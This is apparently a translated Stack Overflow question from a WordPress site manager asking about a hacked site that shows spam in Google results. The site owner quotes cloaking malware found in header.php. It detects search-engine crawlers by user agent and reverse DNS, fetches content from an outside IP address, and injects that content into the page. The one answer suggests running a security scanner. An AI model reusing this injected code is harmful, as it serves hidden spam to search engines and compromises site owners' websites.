我是www.cuscalgary.ca的网站经理。如果你在谷歌搜索"cus calgary“,我的网站上有几个链接,在链接描述(见下面的截图)中似乎有奇怪的荷兰字符串,比如”k pa viagra snabb利用“。此外,我得到了臭名昭著的“这个网站可能被黑”的信息,就在我的网站的主要链接在谷歌。

到目前为止,我已经尝试通过Google浏览器和CTRL+F检查页面代码,以查找搜索结果上显示的单词(例如,试图在Contact Us页面中找到"Paul Junker“),我尝试下载主题文件夹,并通过notepad++执行”搜索文件夹“功能,以查找任何这些奇怪的字符串。我甚至尝试通过Wordpress仪表板查找这些字符串中的任何一个。唉,我没有发现这些奇怪的弦的迹象。
我开始认为Google可能已经有一段时间没有爬上我的网站了,这些字符串已经被删除了。不过,我怀疑情况是否如此。
有没有人有类似的经验,他们找到了解决办法?如果是这样的话,我很想听听你是如何处理这个麻烦的。
非常感谢你的帮助-所有的帮助都是非常感谢的。
凯尔西
更新:
我可能在header.php文件中找到了罪犯。查看我在下面文件开头找到的代码:
<?php
$user_agent_to_filter = array( '#Ask\s*Jeeves#i', '#HP\s*Web\s*PrintSmart#i', '#HTTrack#i', '#IDBot#i', '#Indy\s*Library#',
'#ListChecker#i', '#MSIECrawler#i', '#NetCache#i', '#Nutch#i', '#RPT-HTTPClient#i',
'#rulinki\.ru#i', '#Twiceler#i', '#WebAlta#i', '#Webster\s*Pro#i','#www\.cys\.ru#i',
'#Wysigot#i', '#Yahoo!\s*Slurp#i', '#Yeti#i', '#Accoona#i', '#CazoodleBot#i',
'#CFNetwork#i', '#ConveraCrawler#i','#DISCo#i', '#Download\s*note#i', '#FAST\s*MetaWeb\s*Crawler#i',
'#Flexum\s*spider#i', '#Gigabot#i', '#HTMLParser#i', '#ia_archiver#i', '#ichiro#i',
'#IRLbot#i', '#Java#i', '#km\.ru\s*bot#i', '#kmSearchBot#i', '#libwww-perl#i',
'#Lupa\.ru#i', '#LWP::Simple#i', '#lwp-trivial#i', '#Missigua#i', '#MJ12bot#i',
'#msnbot#i', '#msnbot-media#i', '#Offline\s*Explorer#i', '#OmniExplorer_Bot#i',
'#PEAR#i', '#psbot#i', '#Python#i', '#rulinki\.ru#i', '#SMILE#i',
'#Speedy#i', '#Teleport\s*Pro#i', '#TurtleScanner#i', '#User-Agent#i', '#voyager#i',
'#Webalta#i', '#WebCopier#i', '#WebData#i', '#WebZIP#i', '#Wget#i',
'#Yandex#i', '#Yanga#i', '#Yeti#i','#msnbot#i',
'#spider#i', '#yahoo#i', '#jeeves#i' ,'#google#i' ,'#altavista#i',
'#scooter#i' ,'#av\s*fetch#i' ,'#asterias#i' ,'#spiderthread revision#i' ,'#sqworm#i',
'#ask#i' ,'#lycos.spider#i' ,'#infoseek sidewinder#i' ,'#ultraseek#i' ,'#polybot#i',
'#webcrawler#i', '#robozill#i', '#gulliver#i', '#architextspider#i', '#yahoo!\s*slurp#i',
'#charlotte#i', '#ngb#i', '#BingBot#i' ) ;
if ( !empty( $_SERVER['HTTP_USER_AGENT'] ) && ( FALSE !== strpos( preg_replace( $user_agent_to_filter, '-NO-WAY-', $_SERVER['HTTP_USER_AGENT'] ), '-NO-WAY-' ) ) ){
$isbot = 1;
}
if( FALSE !== strpos( gethostbyaddr($_SERVER['REMOTE_ADDR']), 'google'))
{
$isbot = 1;
}
if(@$isbot){
$_SERVER[HTTP_USER_AGENT] = str_replace(" ", "-", $_SERVER[HTTP_USER_AGENT]);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://173.236.65.24/cakes/?useragent=$_SERVER[HTTP_USER_AGENT]&domain=$_SERVER[HTTP_HOST]");
$result = curl_exec($ch);
curl_close ($ch);
echo $result;
}
?><!DOCTYPE html>发布于 2017-06-14 03:13:11
有可能是的。但是如果不能访问网站本身,很难仅仅从你列出的搜索结果中判断。
安装类似Wordfence (我喜欢的)的东西,让它扫描你的网站。它应该对您服务器上的文件和WP回购处的文件进行比较,如果有任何更改,请通知您。它甚至可能告诉你一些你不知道的事情。
https://stackoverflow.com/questions/44534667
复制相似问题